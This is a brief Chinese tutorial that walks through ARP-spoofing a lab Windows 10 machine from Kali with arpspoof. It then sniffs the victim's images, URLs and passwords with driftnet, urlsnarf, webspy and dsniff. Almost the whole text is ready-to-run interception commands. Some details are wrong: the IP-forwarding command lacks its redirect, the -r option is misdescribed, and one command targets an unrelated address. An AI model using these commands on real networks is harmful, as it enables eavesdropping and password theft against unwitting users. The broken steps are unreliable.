实验环境准备
kali linux 192.168.124.222 win10 192.168.124.123
使用工具
arpspoof 进行arp欺骗 arpspoof是dsniff的插件
dsniff driftnet 嗅探工具
在kali执行
开启ip转发(若不开启则会令目标断网)
echo 1 /proc/sys/net/ipv4/ip_forward
进行欺骗
root@Box:~# arpspoof -i eth0 -t 192.168.124.123 192.168.124.254
192.168.124.254 是网关
arpapoof用法
arpspoof [-i interface] [-c own|host|both] [-t target] [-r] host
-i 指定用攻击机的哪个网络接口
-t 欺骗目标
-r 希望拦截攻击机和哪个host之间的通信,一般都是网关
验证是否欺骗成功
在win10 cmd查看arp缓存表
arp -a
192.168.124.222 与 192.168.124.254 mac地址相同了说明 win10已经被欺骗
进行嗅探
# 实时显示图片
root@kali:~# driftnet -i eth0
# -a 不要在屏幕上显示图像,而是将其保存到一个临时目录中,并在标准输出上公布它们的名称。
# -d 指定目录
# -s 抓取声音
root@kali:~# driftnet -i eth0 -a -d testdir -s
# 抓取 URL
root@kali:~# webspy -i eth0 10.10.10.133
root@kali:~# urlsnarf -i eth0
# 嗅探密码
# -m:自动协议检测
root@kali:~# dsniff -i eth0 -m
# 支持的协议类型
root@kali:~# cat /usr/lib/x86_64-linux-gnu/dsniff.services